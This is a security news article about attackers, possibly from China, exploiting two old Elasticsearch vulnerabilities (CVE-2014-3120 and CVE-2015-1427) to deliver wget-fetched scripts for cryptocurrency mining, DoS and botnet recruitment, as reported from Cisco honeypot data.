Two old vulnerabilities were exploited, allegedly by Chinese hackers
The Cisco network
security and ethical hacking teams recently detected intrusions from
malicious hackers by targeting Elasticsearch clusters to exploit previously
reported vulnerabilities to perform various malicious actions such as malware
injection and cryptocurrency mining, reported experts from the International
Institute of Cyber Security.
“Hackers are attacking users in versions 1.4.2
and earlier,” the network security experts mentioned, after posting a report of
the activity detected by a honeypot.
Given the techniques of attack used, experts
believe that this group of hackers could be originating in China. In the attack
were exploited two vulnerabilities discovered in the years 2014 and 2015, used
to pass scripts to the search queries, which allowed OS hackers to access the
older computers and deploy the payload. Elasticsearch 1.4.2 was released at the
end of 2014.
“The 2014 vulnerability (CVE-2014-3120) allows attackers to execute arbitrary MVEL
expressions, while the 2015 vulnerability (CVE-2015-1427)
allows hackers to bypass sandbox
environments to run arbitrary shell commands through a complex script,” network
security experts mention.
Security teams added: “The first payload
delivered invokes wget to download a bash script, while the second uses a
confusing JavaScript to invoke bash and download the same script with wget.
This is probably an attempt to make the exploit functional on multiple
platforms.”
A Cisco
official reported some of the incidents caused by this attack: “We have
encountered cases of denial-of-service (DoS) attacks, cryptocurrency mining,
and attempts to integrate compromised systems to botnets”.
Although the experts did not explicitly
attribute the attack to Chinese hacker groups, in their report they specified
that the numerical identifier of an account of the Chinese social network QQ
was seen in one of the commands executed by one of the payloads of the attack.
“We analyzed the public account activity of
952135763 and found several posts related to cybersecurity and exploiting
vulnerabilities, although we found nothing related to this particular attack.
Although these details could provide information to find the hackers
responsible for the attack, we do not yet have enough information to know the
attackers,” the experts concluded.
